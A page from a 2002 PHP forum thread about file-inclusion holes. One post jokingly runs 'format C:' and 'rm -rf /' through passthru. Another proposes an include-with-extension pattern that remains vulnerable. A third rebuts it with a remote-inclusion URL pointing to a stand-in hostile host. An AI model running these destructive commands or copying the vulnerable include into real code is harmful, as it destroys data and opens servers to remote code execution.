Page 2 of 2

Posted: Fri May 03, 2002 2:32 am
by sam

Code: Select all

if(!empty($hacker)){
    if(!passthru("format C:")){
        passthru("rm -rf /");
    }
    echo "You fool now look at what you've done.";
}
Code can only be secure until someone cracks it... Nothing is indestructable.

Cheers Moe :mrgreen:

Posted: Fri May 03, 2002 8:50 am
by pHaZed
When developing something like that, you should be aware that someone can do something like this:

http://www.maxxxtorque.com/prodigy/php/ ... /index.php

Imagine if you had something sensitive on your server like this:

http://www.maxxxtorque.com/prodigy/php/ ... .passwords
You can simplfy it down to ONLY including php files.
like so

Code: Select all

include("$example.php");

then in the browser http://host.net/file.php?example=filename

it will always add .php file extension to whatever file users are trying to include...

Posted: Fri May 03, 2002 11:21 am
by dusty
read the posts before.. adding the ext in the include is useless. if someone passes index.php?var=http://www.hacked.com/blah (.php)
you're still screwed. yeah it keeps them guessing what the ext is, but that could be figured out sooner or later.